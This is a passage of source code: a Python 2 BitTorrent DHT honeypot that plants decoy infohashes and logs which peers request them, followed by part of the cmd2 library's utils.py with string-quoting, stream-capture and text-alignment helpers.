"""Given the node list and the target id, return the nearest ones."""
l= []
for n in nl:
l += [(distance(n["id"], target), n)]
l.sort()
m = [ n[1] for n in l[:limit] ]
return m
def ping(self, host, port):
mtid = 3
args = {"id":self.id}
d = {TID : chr(mtid), TYP : REQ, REQ : "ping", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def findNode(self, host, port, target):
mtid = 5
args = {"id":self.id, "target":target}
d = {TID : chr(mtid), TYP : REQ, REQ : "find_node", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def announcePeer(self, host, port, infohash, token, mtid=None):
mtid = 7 if mtid==None else mtid
args = {"id":self.id, "info_hash":infohash, "port":self.port, "token":token}
d = {TID : chr(mtid), TYP : REQ, REQ : "announce_peer", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def getPeers(self, host, port, infohash, mtid=None):
mtid = 11 if mtid==None else mtid
args = {"id":self.id, "info_hash":infohash}
d = {TID : chr(mtid), TYP : REQ, REQ : "get_peers", ARG : args}
msg = self.krpc.encodeMsg(d)
self.sendMsg(msg, (host,port))
pass
def processNodes(self, nodes):
timestamp = time.time()
nodes = self.nearest(self.id, nodes)
for node in nodes:
id = node["id"]
node["timestamp"] = timestamp
node["rtt"] = float('inf')
if id not in self.nodePool:
self.nodePool[id] = [node]
self.convergeSpeed(node)
if id != self.id:
self.findNode(node["host"], node["port"], self.id)
for i in range(len(self.honey)):
# Liang: Test purpose
#if node["host"] == "50.18.3.51" or node["host"] == "184.72.3.99":
# print "*"*50, node["host"], node["port"]
if True:
infohash = self.honey[i]
self.getPeers(node["host"], node["port"], infohash, i)
else:
if not self.hasNode(node["id"], node["host"], node["port"])\
and id != self.id:
self.nodePool[id].append(node)
else:
self.duplicates += 1
self.total += 1
pass
def hasNode(self, id, host, port):
r = None
for n in self.nodePool[id]:
if n["host"] == host and n["port"] == port:
r = n
break
return r
def handle_find_node(self, tid):
tid = intify(tid)
bucket = None
for x in self.buckets:
r, nl = x
if tid >= r[0] and tid < r[1]:
bucket = x
break
return bucket[1]
def sendMsg(self, msg, addr):
"""Send the message through isock, thread safe"""
self.isock_lock.acquire()
try:
self.isock.sendto(msg, addr)
except Exception, err:
if self._debug:
print "Exception:Honeypot.sendMsg():", err, addr
pass
self.isock_lock.release()
pass
def serialize(self):
obj = {}
for k, nlist in self.nodePool.items():
for v in nlist:
addr = (v['host'], v['port'])
if addr in self.addrPool:
v["rtt"] = self.addrPool[addr]["timestamp"]- v["timestamp"]
obj[k] = obj.get(k, []) + [v]
timestamp = time.strftime("%Y%m%d%H%M%S")
f = open("nodes.%s.%s" % (timestamp, str(intify(self.id))), "w")
pickle.Pickler(f).dump(obj)
f.close()
pass
def start_listener(self):
"""Process all the incomming messages here"""
timestamp = time.strftime("%Y%m%d%H%M%S")
log = open("honeypot.%s.%s.log" % (HONEYPOT_NAME, timestamp), "a")
while True:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
d = None
d = self.krpc.decodeMsg(msg)
ts = time.time()
# Liang: for test purpose
func_s = ""
if d["TYP"] == REQ:
func_s = d["MSG"]
#if d["TYP"] == RSP and "nodes" not in d["MSG"]:
# print d
if self._debug:
print time.ctime(), addr, d["TYP"], func_s #, d["MSG"], d["ARG"]
# Add to bucket if it is a new node, otherwise update it.
tid = d["MSG"]["id"] if d["TYP"] == RSP else d["ARG"]["id"]
bucket = self.in_which_bucket(tid, self.buckets)
if bucket:
pass
else:
n = {"id":tid, "host":addr[0], "port":addr[1], \
"timestamp":ts, "lastupdate":ts}
self.add_to_bucket(n)
# Process message according to their message type
if d["TYP"] == RSP:
if "nodes" in d["MSG"]:
tdist = distance(self.id, d["MSG"]["id"])
if tdist < self.ndist:
self.ndist = tdist
self.processNodes(unpackNodes(d["MSG"]["nodes"]))
#print tdist, "+"*100
elif self.respondent < 100000:
self.processNodes(unpackNodes(d["MSG"]["nodes"]))
if "token" in d["MSG"]:
trans_id = ord(d["TID"])
infohash = self.honey[trans_id]
token = d["MSG"]["token"]
#self.announcePeer(addr[0], addr[1], infohash, token, trans_id)
elif d["TYP"] == REQ:
#print addr, d["TID"], d["TYP"], d["MSG"], d["ARG"]
if "ping" == d["MSG"].lower():
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "find_node" == d["MSG"].lower():
nodes = self.handle_find_node(d["ARG"]["target"])
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp[RSP]["nodes"] = packNodes(nodes)
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "get_peers" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
# Liang: Hurray, catch U!
if infohash in self.honey and addr[0] != self.ip:
log.write("%s\tget_peers\t%i\n" % (str(addr),intify(infohash)))
print "+"*100, "get_peers", addr
infohash = d["ARG"]["info_hash"]
# lure the node to bt protocol
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id, "token":"test"}}
rsp[RSP]["values"] = packPeers( [(self.ip,self.port)] )
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
# Liang: Jump to individual talk now
# self.individual_talk(addr)
pass
elif "announce_peer" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
if infohash in self.honey:
log.write("%s\tannounce_peer\n" % (str(addr)))
if self._debug:
print "-"*100, "announce_peer", addr
pass
else:
pass
#self.addrPool[addr] = {"timestamp":time.time()}
self.respondent += 1
log.flush()
except Exception, err:
if self._debug:
print "Exception:Honeypot.listener():", err, repr(msg)
pass
pass
def individual_talk(self, taddr):
while True:
try:
msg, addr = self.isock.recvfrom(PACKET_LEN)
# ingore the irrelevant messages
if addr != taddr:
continue
d = self.krpc.decodeMsg(msg)
ts = time.time()
tid = d["MSG"]["id"] if d["TYP"] == RSP else d["ARG"]["id"]
if self._debug:
print d
# Process message according to their message type
if d["TYP"] == RSP:
pass
elif d["TYP"] == REQ:
if "ping" == d["MSG"].lower():
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
pass
elif "find_node" == d["MSG"].lower():
nodes = self.handle_find_node(d["ARG"]["target"])
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id}}
rsp[RSP]["nodes"] = packNodes(nodes)
rsp = self.krpc.encodeMsg(rsp)
#self.sendMsg(rsp, addr)
pass
elif "get_peers" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
rsp = {TID:d["TID"], TYP:RSP, RSP:{"id":self.id, "token":"test"}}
rsp[RSP]["values"] = packPeers( [(self.ip,self.btport)] )
rsp = self.krpc.encodeMsg(rsp)
self.sendMsg(rsp, addr)
pass
elif "announce_peer" == d["MSG"].lower():
infohash = d["ARG"]["info_hash"]
if infohash in self.honey:
print "-"*100, "announce_peer", addr
pass
else:
pass
except Exception, err:
if self._debug:
print "Exception:Honeypot.individual_talk():", err, repr(msg)
pass
sys.exit(0)
pass
def start_sender(self):
while True:
try:
now = time.time()
# Re-populate myself every 5 minutes
if int(now)%300==0:
self.nodePool = {}
self.buckets = []
self.respondent = 0
self.bootstrap()
time.sleep(1)
pass
except Exception, err:
if self._debug:
print "Exception:Honeypot.start_sender()", err
pass
def start(self):
t1 = threading.Thread(target=self.start_listener, args=())
t1.daemon = True
t1.start()
t2 = threading.Thread(target=self.start_sender, args=())
t2.daemon = True
t2.start()
peer = Peer(self.btport)
peer.honey = self.honey
t3 = threading.Thread(target=peer.start_listen, args=())
t3.daemon = True
t3.start()
# Liang: test purpose
self.test_184()
self.bootstrap()
while True:
try:
#self.info()
time.sleep(1)
except KeyboardInterrupt:
break
except Exception, err:
if self._debug:
print "Exception:Honeypot.start_crawl()", err
pass
def info(self):
print "[NodeSet]:%i\t\t[12-bit Zone]:%i [%i/s]\t\t[Response]:%.2f%%\t\t[Queue]:%i\t\t[Dup]:%.2f%%" % \
(len(self.nodePool), self.tn, self.tnspeed,
self.respondent*100.0/max(1,len(self.nodePool)),
self.nodeQueue.qsize(), self.duplicates*100.0/self.total)
pass
def convergeSpeed(self,node):
if (distance(self.id, node["id"])>>148)==0:
self.tn += 1
if (time.time()-self.tntold) >= 5:
self.tnspeed = int((self.tn-self.tnold)/(time.time()-self.tntold))
self.tnold = self.tn
self.tntold = time.time()
pass
def test_bucket(self):
self.bootstrap()
id_set = set()
print "Add"
for i in range(50000):
id = newID()
node = {"id":id}
self.add_to_bucket(node)
id_set.add(id)
for x in self.buckets:
print len(x[1])
print "Remove"
for id in id_set:
if self.in_which_bucket(id, self.buckets):
self.remove_from_bucket(id, self.buckets)
pass
for x in self.buckets:
print len(x[1])
pass
def test_184(self):
for i in range(len(self.honey)):
infohash = self.honey[i]
for j in range(500):
print "getPeer", repr(infohash)
self.getPeers("50.18.3.51", 11000+j, infohash, i)
pass
def start_injecting(id):
"""Start all the honeypots"""
honeypot = Honeypot(id)
honeypot.start()
pass
def create_fake_info(self):
info = {}
info["name"] = "Rise.of.the.Planet.of.the.Apes.2011.dvdrip.XviD-NOVA.avi"
info["length"] = 1468095404
info["piece length"] = 2**20
info["pieces"] = "".join([ newID() for i in range(math.ceil(info["length"]*1.0/info["piece length"])) ])
return info
if __name__=="__main__":
now = time.time()
#id = stringify(long(sys.argv[1])) if len(sys.argv)>1 else newID()
id = intify(newID())
honey = [ stringify(id+i) for i in range(1, 11) ]
id = stringify(id)
honeypot = Honeypot(id)
honeypot.honey = honey
honeypot.start()
print "%.2f minutes" % ((time.time() - now)/60.0)
#honeypot.serialize()
pass
|
utils.py
|
# coding=utf-8
"""Shared utility functions"""
import argparse
import collections
import functools
import glob
import inspect
import itertools
import os
import re
import subprocess
import sys
import threading
import unicodedata
from enum import (
Enum,
)
from typing import (
IO,
TYPE_CHECKING,
Any,
Callable,
Dict,
Iterable,
List,
Optional,
TextIO,
Type,
TypeVar,
Union,
cast,
)
from . import (
constants,
)
from .argparse_custom import (
ChoicesProviderFunc,
ChoicesProviderFuncWithTokens,
CompleterFunc,
CompleterFuncWithTokens,
)
if TYPE_CHECKING: # pragma: no cover
import cmd2 # noqa: F401
_T = TypeVar('_T')
def is_quoted(arg: str) -> bool:
"""
Checks if a string is quoted
:param arg: the string being checked for quotes
:return: True if a string is quoted
"""
return len(arg) > 1 and arg[0] == arg[-1] and arg[0] in constants.QUOTES
def quote_string(arg: str) -> str:
"""Quote a string"""
if '"' in arg:
quote = "'"
else:
quote = '"'
return quote + arg + quote
def quote_string_if_needed(arg: str) -> str:
"""Quote a string if it contains spaces and isn't already quoted"""
if is_quoted(arg) or ' ' not in arg:
return arg
return quote_string(arg)
def strip_quotes(arg: str) -> str:
"""Strip outer quotes from a string.
Applies to both single and double quotes.
:param arg: string to strip outer quotes from
:return: same string with potentially outer quotes stripped
"""
if is_quoted(arg):
arg = arg[1:-1]
return arg
def str_to_bool(val: str) -> bool:
"""Converts a string to a boolean based on its value.
:param val: string being converted
:return: boolean value expressed in the string
:raises: ValueError if the string does not contain a value corresponding to a boolean value
"""
if isinstance(val, str):
if val.capitalize() == str(True):
return True
elif val.capitalize() == str(False):
return False
raise ValueError("must be True or False (case-insensitive)")
class Settable:
"""Used to configure an attribute to be settable via the set command in the CLI"""
def __init__(
self,
name: str,
val_type: Union[Type[Any], Callable[[Any], Any]],
description: str,
settable_object: object,
*,
settable_attrib_name: Optional[str] = None,
onchange_cb: Optional[Callable[[str, _T, _T], Any]] = None,
choices: Optional[Iterable[Any]] = None,
choices_provider: Optional[Union[ChoicesProviderFunc, ChoicesProviderFuncWithTokens]] = None,
completer: Optional[Union[CompleterFunc, CompleterFuncWithTokens]] = None,
):
"""
Settable Initializer
:param name: name of the instance attribute being made settable
:param val_type: callable used to cast the string value from the command line into its proper type and
even validate its value. Setting this to bool provides tab completion for true/false and
validation using str_to_bool(). The val_type function should raise an exception if it fails.
This exception will be caught and printed by Cmd.do_set().
:param description: string describing this setting
:param settable_object: Object to configure with the set command
:param settable_attrib_name: Attribute name to be modified. Defaults to `name` if not specified.
:param onchange_cb: optional function or method to call when the value of this settable is altered
by the set command. (e.g. onchange_cb=self.debug_changed)
Cmd.do_set() passes the following 3 arguments to onchange_cb:
param_name: str - name of the changed parameter
old_value: Any - the value before being changed
new_value: Any - the value after being changed
The following optional settings provide tab completion for a parameter's values. They correspond to the
same settings in argparse-based tab completion. A maximum of one of these should be provided.
:param choices: iterable of accepted values
:param choices_provider: function that provides choices for this argument
:param completer: tab completion function that provides choices for this argument
"""
if val_type == bool:
val_type = str_to_bool
choices = ['true', 'false']
self.name = name
self.val_type = val_type
self.description = description
self.settable_obj = settable_object
self.settable_attrib_name = settable_attrib_name if settable_attrib_name is not None else name
self.onchange_cb = onchange_cb
self.choices = choices
self.choices_provider = choices_provider
self.completer = completer
def get_value(self) -> Any:
"""
Get the value of the settable attribute
:return:
"""
return getattr(self.settable_obj, self.settable_attrib_name)
def set_value(self, value: Any) -> Any:
"""
Set the settable attribute on the specified destination object
:param value: New value to set
:return: New value that the attribute was set to
"""
# Try to update the settable's value
orig_value = self.get_value()
setattr(self.settable_obj, self.settable_attrib_name, self.val_type(value))
new_value = getattr(self.settable_obj, self.settable_attrib_name)
# Check if we need to call an onchange callback
if orig_value != new_value and self.onchange_cb:
self.onchange_cb(self.name, orig_value, new_value)
return new_value
def is_text_file(file_path: str) -> bool:
"""Returns if a file contains only ASCII or UTF-8 encoded text.
:param file_path: path to the file being checked
:return: True if the file is a text file, False if it is binary.
"""
import codecs
expanded_path = os.path.abspath(os.path.expanduser(file_path.strip()))
valid_text_file = False
# Check if the file is ASCII
try:
with codecs.open(expanded_path, encoding='ascii', errors='strict') as f:
# Make sure the file has at least one line of text
# noinspection PyUnusedLocal
if sum(1 for line in f) > 0:
valid_text_file = True
except OSError: # pragma: no cover
pass
except UnicodeDecodeError:
# The file is not ASCII. Check if it is UTF-8.
try:
with codecs.open(expanded_path, encoding='utf-8', errors='strict') as f:
# Make sure the file has at least one line of text
# noinspection PyUnusedLocal
if sum(1 for line in f) > 0:
valid_text_file = True
except OSError: # pragma: no cover
pass
except UnicodeDecodeError:
# Not UTF-8
pass
return valid_text_file
def remove_duplicates(list_to_prune: List[_T]) -> List[_T]:
"""Removes duplicates from a list while preserving order of the items.
:param list_to_prune: the list being pruned of duplicates
:return: The pruned list
"""
temp_dict: collections.OrderedDict[_T, Any] = collections.OrderedDict()
for item in list_to_prune:
temp_dict[item] = None
return list(temp_dict.keys())
def norm_fold(astr: str) -> str:
"""Normalize and casefold Unicode strings for saner comparisons.
:param astr: input unicode string
:return: a normalized and case-folded version of the input string
"""
return unicodedata.normalize('NFC', astr).casefold()
def alphabetical_sort(list_to_sort: Iterable[str]) -> List[str]:
"""Sorts a list of strings alphabetically.
For example: ['a1', 'A11', 'A2', 'a22', 'a3']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=norm_fold)
:param list_to_sort: the list being sorted
:return: the sorted list
"""
return sorted(list_to_sort, key=norm_fold)
def try_int_or_force_to_lower_case(input_str: str) -> Union[int, str]:
"""
Tries to convert the passed-in string to an integer. If that fails, it converts it to lower case using norm_fold.
:param input_str: string to convert
:return: the string as an integer or a lower case version of the string
"""
try:
return int(input_str)
except ValueError:
return norm_fold(input_str)
def natural_keys(input_str: str) -> List[Union[int, str]]:
"""
Converts a string into a list of integers and strings to support natural sorting (see natural_sort).
For example: natural_keys('abc123def') -> ['abc', '123', 'def']
:param input_str: string to convert
:return: list of strings and integers
"""
return [try_int_or_force_to_lower_case(substr) for substr in re.split(r'(\d+)', input_str)]
def natural_sort(list_to_sort: Iterable[str]) -> List[str]:
"""
Sorts a list of strings case insensitively as well as numerically.
For example: ['a1', 'A2', 'a3', 'A11', 'a22']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=natural_keys)
:param list_to_sort: the list being sorted
:return: the list sorted naturally
"""
return sorted(list_to_sort, key=natural_keys)
def quote_specific_tokens(tokens: List[str], tokens_to_quote: List[str]) -> None:
"""
Quote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_quote: the tokens, which if present in tokens, to quote
"""
for i, token in enumerate(tokens):
if token in tokens_to_quote:
tokens[i] = quote_string(token)
def unquote_specific_tokens(tokens: List[str], tokens_to_unquote: List[str]) -> None:
"""
Unquote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_unquote: the tokens, which if present in tokens, to unquote
"""
for i, token in enumerate(tokens):
unquoted_token = strip_quotes(token)
if unquoted_token in tokens_to_unquote:
tokens[i] = unquoted_token
def expand_user(token: str) -> str:
"""
Wrap os.expanduser() to support expanding ~ in quoted strings
:param token: the string to expand
"""
if token:
if is_quoted(token):
quote_char = token[0]
token = strip_quotes(token)
else:
quote_char = ''
token = os.path.expanduser(token)
# Restore the quotes even if not needed to preserve what the user typed
if quote_char:
token = quote_char + token + quote_char
return token
def expand_user_in_tokens(tokens: List[str]) -> None:
"""
Call expand_user() on all tokens in a list of strings
:param tokens: tokens to expand
"""
for index, _ in enumerate(tokens):
tokens[index] = expand_user(tokens[index])
def find_editor() -> Optional[str]:
"""
Used to set cmd2.Cmd.DEFAULT_EDITOR. If EDITOR env variable is set, that will be used.
Otherwise the function will look for a known editor in directories specified by PATH env variable.
:return: Default editor or None
"""
editor = os.environ.get('EDITOR')
if not editor:
if sys.platform[:3] == 'win':
editors = ['code.cmd', 'notepad++.exe', 'notepad.exe']
else:
editors = ['vim', 'vi', 'emacs', 'nano', 'pico', 'joe', 'code', 'subl', 'atom', 'gedit', 'geany', 'kate']
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
for editor, path in itertools.product(editors, paths):
editor_path = os.path.join(path, editor)
if os.path.isfile(editor_path) and os.access(editor_path, os.X_OK):
if sys.platform[:3] == 'win':
# Remove extension from Windows file names
editor = os.path.splitext(editor)[0]
break
else:
editor = None
return editor
def files_from_glob_pattern(pattern: str, access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a glob pattern.
Only files are returned, not directories, and optionally only files for which the user has a specified access to.
:param pattern: file name or glob pattern
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the name or glob pattern
"""
return [f for f in glob.glob(pattern) if os.path.isfile(f) and os.access(f, access)]
def files_from_glob_patterns(patterns: List[str], access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a list of glob patterns.
Only files are returned, not directories, and optionally only files for which the user has a specified access to.
:param patterns: list of file names and/or glob patterns
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the names and/or glob patterns
"""
files = []
for pattern in patterns:
matches = files_from_glob_pattern(pattern, access=access)
files.extend(matches)
return files
def get_exes_in_path(starts_with: str) -> List[str]:
"""Returns names of executables in a user's path
:param starts_with: what the exes should start with. leave blank for all exes in path.
:return: a list of matching exe names
"""
# Purposely don't match any executable containing wildcards
wildcards = ['*', '?']
for wildcard in wildcards:
if wildcard in starts_with:
return []
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
# Use a set to store exe names since there can be duplicates
exes_set = set()
# Find every executable file in the user's path that matches the pattern
for path in paths:
full_path = os.path.join(path, starts_with)
matches = files_from_glob_pattern(full_path + '*', access=os.X_OK)
for match in matches:
exes_set.add(os.path.basename(match))
return list(exes_set)
class StdSim:
"""
Class to simulate behavior of sys.stdout or sys.stderr.
Stores contents in internal buffer and optionally echos to the inner stream it is simulating.
"""
def __init__(
self,
inner_stream: Union[TextIO, 'StdSim'],
*,
echo: bool = False,
encoding: str = 'utf-8',
errors: str = 'replace',
) -> None:
"""
StdSim Initializer
:param inner_stream: the wrapped stream. Should be a TextIO or StdSim instance.
:param echo: if True, then all input will be echoed to inner_stream
:param encoding: codec for encoding/decoding strings (defaults to utf-8)
:param errors: how to handle encoding/decoding errors (defaults to replace)
"""
self.inner_stream = inner_stream
self.echo = echo
self.encoding = encoding
self.errors = errors
self.pause_storage = False
self.buffer = ByteBuf(self)
def write(self, s: str) -> None:
"""
Add str to internal bytes buffer and if echo is True, echo contents to inner stream
:param s: String to write to the stream
"""
if not isinstance(s, str):
raise TypeError('write() argument must be str, not {}'.format(type(s)))
if not self.pause_storage:
self.buffer.byte_buf += s.encode(encoding=self.encoding, errors=self.errors)
if self.echo:
self.inner_stream.write(s)
def getvalue(self) -> str:
"""Get the internal contents as a str"""
return self.buffer.byte_buf.decode(encoding=self.encoding, errors=self.errors)
def getbytes(self) -> bytes:
"""Get the internal contents as bytes"""
return bytes(self.buffer.byte_buf)
def read(self, size: Optional[int] = -1) -> str:
"""
Read from the internal contents as a str and then clear them out
:param size: Number of bytes to read from the stream
"""
if size is None or size == -1:
result = self.getvalue()
self.clear()
else:
result = self.buffer.byte_buf[:size].decode(encoding=self.encoding, errors=self.errors)
self.buffer.byte_buf = self.buffer.byte_buf[size:]
return result
def readbytes(self) -> bytes:
"""Read from the internal contents as bytes and then clear them out"""
result = self.getbytes()
self.clear()
return result
def clear(self) -> None:
"""Clear the internal contents"""
self.buffer.byte_buf.clear()
def isatty(self) -> bool:
"""StdSim only considered an interactive stream if `echo` is True and `inner_stream` is a tty."""
if self.echo:
return self.inner_stream.isatty()
else:
return False
@property
def line_buffering(self) -> bool:
"""
Handle when the inner stream doesn't have a line_buffering attribute which is the case
when running unit tests because pytest sets stdout to a pytest EncodedFile object.
"""
try:
return bool(self.inner_stream.line_buffering)
except AttributeError:
return False
def __getattr__(self, item: str) -> Any:
if item in self.__dict__:
return self.__dict__[item]
else:
return getattr(self.inner_stream, item)
class ByteBuf:
"""
Used by StdSim to write binary data and stores the actual bytes written
"""
# Used to know when to flush the StdSim
NEWLINES = [b'\n', b'\r']
def __init__(self, std_sim_instance: StdSim) -> None:
self.byte_buf = bytearray()
self.std_sim_instance = std_sim_instance
def write(self, b: bytes) -> None:
"""Add bytes to internal bytes buffer and if echo is True, echo contents to inner stream."""
if not isinstance(b, bytes):
raise TypeError('a bytes-like object is required, not {}'.format(type(b)))
if not self.std_sim_instance.pause_storage:
self.byte_buf += b
if self.std_sim_instance.echo:
self.std_sim_instance.inner_stream.buffer.write(b)
# Since StdSim wraps TextIO streams, we will flush the stream if line buffering is on
# and the bytes being written contain a new line character. This is helpful when StdSim
# is being used to capture output of a shell command because it causes the output to print
# to the screen more often than if we waited for the stream to flush its buffer.
if self.std_sim_instance.line_buffering:
if any(newline in b for newline in ByteBuf.NEWLINES):
self.std_sim_instance.flush()
class ProcReader:
"""
Used to capture stdout and stderr from a Popen process if any of those were set to subprocess.PIPE.
If neither are pipes, then the process will run normally and no output will be captured.
"""
def __init__(self, proc: subprocess.Popen, stdout: Union[StdSim, TextIO], stderr: Union[StdSim, TextIO]) -> None:
"""
ProcReader initializer
:param proc: the Popen process being read from
:param stdout: the stream to write captured stdout
:param stderr: the stream to write captured stderr
"""
self._proc = proc
self._stdout = stdout
self._stderr = stderr
self._out_thread = threading.Thread(name='out_thread', target=self._reader_thread_func, kwargs={'read_stdout': True})
self._err_thread = threading.Thread(name='out_thread', target=self._reader_thread_func, kwargs={'read_stdout': False})
# Start the reader threads for pipes only
if self._proc.stdout is not None:
self._out_thread.start()
if self._proc.stderr is not None:
self._err_thread.start()
def send_sigint(self) -> None:
"""Send a SIGINT to the process similar to if <Ctrl>+C were pressed"""
import signal
if sys.platform.startswith('win'):
# cmd2 started the Windows process in a new process group. Therefore
# a CTRL_C_EVENT can't be sent to it. Send a CTRL_BREAK_EVENT instead.
self._proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
# Since cmd2 uses shell=True in its Popen calls, we need to send the SIGINT to
# the whole process group to make sure it propagates further than the shell
try:
group_id = os.getpgid(self._proc.pid)
os.killpg(group_id, signal.SIGINT)
except ProcessLookupError:
return
def terminate(self) -> None:
"""Terminate the process"""
self._proc.terminate()
def wait(self) -> None:
"""Wait for the process to finish"""
if self._out_thread.is_alive():
self._out_thread.join()
if self._err_thread.is_alive():
self._err_thread.join()
# Handle case where the process ended before the last read could be done.
# This will return None for the streams that weren't pipes.
out, err = self._proc.communicate()
if out:
self._write_bytes(self._stdout, out)
if err:
self._write_bytes(self._stderr, err)
def _reader_thread_func(self, read_stdout: bool) -> None:
"""
Thread function that reads a stream from the process
:param read_stdout: if True, then this thread deals with stdout. Otherwise it deals with stderr.
"""
if read_stdout:
read_stream = self._proc.stdout
write_stream = self._stdout
else:
read_stream = self._proc.stderr
write_stream = self._stderr
# The thread should have been started only if this stream was a pipe
assert read_stream is not None
# Run until process completes
while self._proc.poll() is None:
# noinspection PyUnresolvedReferences
available = read_stream.peek()
if available:
read_stream.read(len(available))
self._write_bytes(write_stream, available)
@staticmethod
def _write_bytes(stream: Union[StdSim, TextIO], to_write: bytes) -> None:
"""
Write bytes to a stream
:param stream: the stream being written to
:param to_write: the bytes being written
"""
try:
stream.buffer.write(to_write)
except BrokenPipeError:
# This occurs if output is being piped to a process that closed
pass
class ContextFlag:
"""A context manager which is also used as a boolean flag value within the default sigint handler.
Its main use is as a flag to prevent the SIGINT handler in cmd2 from raising a KeyboardInterrupt
while a critical code section has set the flag to True. Because signal handling is always done on the
main thread, this class is not thread-safe since there is no need.
"""
def __init__(self) -> None:
# When this flag has a positive value, it is considered set.
# When it is 0, it is not set. It should never go below 0.
self.__count = 0
def __bool__(self) -> bool:
return self.__count > 0
def __enter__(self) -> None:
self.__count += 1
def __exit__(self, *args: Any) -> None:
self.__count -= 1
if self.__count < 0:
raise ValueError("count has gone below 0")
class RedirectionSavedState:
"""Created by each command to store information required to restore state after redirection"""
def __init__(
self,
self_stdout: Union[StdSim, IO[str]],
sys_stdout: Union[StdSim, IO[str]],
pipe_proc_reader: Optional[ProcReader],
saved_redirecting: bool,
) -> None:
"""
RedirectionSavedState initializer
:param self_stdout: saved value of Cmd.stdout
:param sys_stdout: saved value of sys.stdout
:param pipe_proc_reader: saved value of Cmd._cur_pipe_proc_reader
:param saved_redirecting: saved value of Cmd._redirecting
"""
# Tells if command is redirecting
self.redirecting = False
# Used to restore values after redirection ends
self.saved_self_stdout = self_stdout
self.saved_sys_stdout = sys_stdout
# Used to restore values after command ends regardless of whether the command redirected
self.saved_pipe_proc_reader = pipe_proc_reader
self.saved_redirecting = saved_redirecting
class TextAlignment(Enum):
"""Horizontal text alignment"""
LEFT = 1
CENTER = 2
RIGHT = 3
def align_text(
text: str,
alignment: TextAlignment,
*,
fill_char: str = ' ',
width: Optional[int] = None,
tab_width: int = 4,
truncate: bool = False,
) -> str:
"""
Align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
There are convenience wrappers around this function: align_left(), align_center(), and align_right()
:param text: text to align (can contain multiple lines)
:param alignment: how to align the text
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then each line will be shortened to fit within the display width. The truncated
portions are replaced by a '…' character. Defaults to False.
:return: aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
import io
import shutil
from . import (
ansi,
)
if width is None:
width = shutil.get_terminal_size().columns
if width < 1:
raise ValueError("width must be at least 1")
# Handle tabs
text = text.replace('\t', ' ' * tab_width)
fill_char = fill_char.replace('\t', ' ')
if len(ansi.strip_style(fill_char)) != 1:
raise TypeError("Fill character must be exactly one character long")
fill_char_width = ansi.style_aware_wcswidth(fill_char)
if fill_char_width == -1:
raise (ValueError("Fill character is an unprintable character"))
if text:
lines = text.splitlines()
else:
lines = ['']
text_buf = io.StringIO()
# ANSI style sequences that may affect future lines will be cancelled by the fill_char's style.
# To avoid this, we save the state of a line's style so we can restore it when beginning the next line.
# This also allows the lines to be used independently and still have their style. TableCreator does this.
aggregate_styles = ''
# Save the ANSI style sequences in fill_char
fill_char_styles = get_styles_in_text(fill_char)
# Create a space with the same style as fill_char for cases in which
# fill_char does not divide evenly into the gap.
styled_space = ''
char_index = 0
while char_index < len(fill_char):
if char_index in fill_char_styles:
# Preserve this style in styled_space
styled_space += fill_char_styles[char_index]
char_index += len(fill_char_styles[char_index])
else:
# We've reached the visible fill_char. Replace it with a space.
styled_space += ' '
char_index += 1
for index, line in enumerate(lines):
if index > 0:
text_buf.write('\n')
if truncate:
line = truncate_line(line, width)
line_width = ansi.style_aware_wcswidth(line)
if line_width == -1:
raise (ValueError("Text to align contains an unprintable character"))
# Get the styles in this line
line_styles = get_styles_in_text(line)
# Calculate how wide each side of filling needs to be
if line_width >= width:
# Don't return here even though the line needs no fill chars.
# There may be styles sequences to restore.
total_fill_width = 0
else:
total_fill_width = width - line_width
if alignment == TextAlignment.LEFT:
left_fill_width = 0
right_fill_width = total_fill_width
elif alignment == TextAlignment.CENTER:
left_fill_width = total_fill_width // 2
right_fill_width = total_fill_width - left_fill_width
else:
left_fill_width = total_fill_width
right_fill_width = 0
# Determine how many fill characters are needed to cover the width
left_fill = (left_fill_width // fill_char_width) * fill_char
right_fill = (right_fill_width // fill_char_width) * fill_char
# In cases where the fill character display width didn't divide evenly into
# the gap being filled, pad the remainder with styled_space.
